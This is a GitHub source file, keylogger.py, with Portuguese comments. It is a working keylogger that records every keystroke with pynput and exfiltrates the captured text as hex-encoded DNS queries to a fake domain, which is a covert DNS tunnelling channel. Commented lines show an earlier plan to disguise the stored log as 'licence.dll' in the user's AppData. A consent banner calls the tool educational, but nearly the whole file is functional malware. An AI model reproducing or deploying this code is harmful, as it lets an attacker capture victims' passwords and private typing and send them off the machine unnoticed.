-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathkeylogger.py
184 lines (159 loc) · 5.89 KB
/
keylogger.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
###############################################################
# Imports
###############################################################
import socket
import random
import sys, os, time
from pynput import keyboard
from dnslib import DNSRecord
###############################################################
# Vars. Global
###############################################################
# Ofuscação no Windows (Antigamente era salvo em arquivo... mudei os planos)
# _PATH = f'C:\\Users\\{os.getlogin()}\\AppData\\Local\\Microsoft\\Windows NA'
# _NAME = 'licence.dll'
# Futuramente podemos passar essas VARs global para dentro das funções
# está aqui apenas para facilitar as alterações
_DNS_ADDR = ('127.0.0.1', 9953)
_FAKE_DOMAIN = '.fake-domain.com.'
_KEYS = []
_USR_HAS = None
_COR = {
'limpa':'\033[m',
'red':'\033[31m',
'green':'\033[32m',
'yellow':'\033[33m'
}
###############################################################
# Classes e Funções
###############################################################
def limpar_tela():
if 'linux' in sys.platform:
os.system('clear')
elif 'win' in sys.platform:
os.system('cls')
def alert_run():
limpar_tela()
print(f'''
{_COR['red']}
╦╔═┌─┐┬ ┬┬ ┌─┐┌─┐┌─┐┌─┐┬─┐
╠╩╗├┤ └┬┘│ │ ││ ┬│ ┬├┤ ├┬┘
╩ ╩└─┘ ┴ ┴─┘└─┘└─┘└─┘└─┘┴└─
╔═╗┬ ┌─┐┬─┐┌┬┐
╠═╣│ ├┤ ├┬┘ │
╩ ╩┴─┘└─┘┴└─ ┴
########################### ALERTA #################################
# Esta ferramenta é destinada exclusivamente para fins educativos #
# e de conscientização sobre os perigos do utilizar soluções não #
# licenciadas (crackeadas). O uso desta ferramenta em ambientes #
# não autorizados ou para atividades maliciosas é estritamente: #
# >>> PROIBIDO <<< #
####################################################################
# Ao executar esta ferramenta, você dará acesso irrestrito ao #
# "outro lado" aos eventos de Input/Output do seu sistema op. #
# Se você não está em um ambiente controlado ou não sabe do que #
# esse software se trata, por gentileza NÃO O EXECUTE. #
########################### ALERTA #################################''')
consentimento = input(f'''{_COR['limpa']}Concorda? (sim ou nao)> {_COR['limpa']}''')
if consentimento == 'sim':
print(f'''{_COR['yellow']}Carregando...{_COR['limpa']}''')
time.sleep(1)
limpar_tela()
print('Keylogger executando... \n Precione "ESC" para fecha-lo!')
pass
else:
sys.exit()
def hash_adler32(data):
a = 1
size = len(data)
b = size % 35
for ch in data:
a = a + ord(ch) % 35
b = b + size * ord(ch) % 35
return hex(b * 35 + a)[2:]
def send_data(data):
'''
Recebe os dados e os envia usando requisições DNS
de 63 em 63 bytes.
Parameters:
data (str): Data que iremos enviar
Returns:
None
'''
global _DNS_ADDR, _FAKE_DOMAIN
payload = ''.join([hex(ord(c)) for c in data]) # ord() no c
payload = payload.replace('0x', '')
request = str(payload) + str(_FAKE_DOMAIN)
# Cria a requisição DNS
domain = DNSRecord.question(request)
# Envia a requisição DNS para o servidor
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(3.0)
sock.sendto(domain.pack(), _DNS_ADDR)
_ = sock.recvfrom(512)
except:
pass
def on_release(key):
global _KEYS, _USR_HAS
# Verifico se já está no tamanho de mandar o pacote DNS
# 31 pois temos que converter para Hex, totalizando 62
if len(_KEYS) >= (31 - len(_USR_HAS)):
for ch in _USR_HAS:
_KEYS.insert(0, ch)
send_data(_KEYS)
_KEYS = []
# Condição de parada
if key == keyboard.Key.esc:
return False
# Trato teclas / numeros
try:
if key.char != None:
_KEYS.append(key.char) # ord()
# print(key.char)
else:
if '<96>' == str(key):
_KEYS.append('0')
elif '<97>' == str(key):
_KEYS.append('1')
elif '<98>' == str(key):
_KEYS.append('2')
elif '<99>' == str(key):
_KEYS.append('3')
elif '<100>' == str(key):
_KEYS.append('4')
elif '<101>' == str(key):
_KEYS.append('5')
elif '<102>' == str(key):
_KEYS.append('6')
elif '<103>' == str(key):
_KEYS.append('7')
elif '<104>' == str(key):
_KEYS.append('8')
elif '<105>' == str(key):
_KEYS.append('9')
# todo o resto que não tratei
# else:
# print(f'Não consegui identificar: {key}')
# Trato se for algum caractere especial
except AttributeError:
if str(key) == 'Key.space' or \
str(key) == 'Key.enter' or \
str(key) == 'Key.tab':
_KEYS.append(' ')
elif str(key) == 'Key.backspace':
if _KEYS:
_KEYS.pop(-1)
# else:
# print(f'Não tenho tratamento para isso: {key}')
###############################################################
# Main
###############################################################
if __name__ == "__main__":
alert_run()
# Gerando nome aleatório
_USR_HAS = [char for char in hash_adler32(str(random.randint(100, 999)))]
# Iniciando Keylogger
lst = keyboard.Listener(on_release=on_release)
lst.start()
lst.join()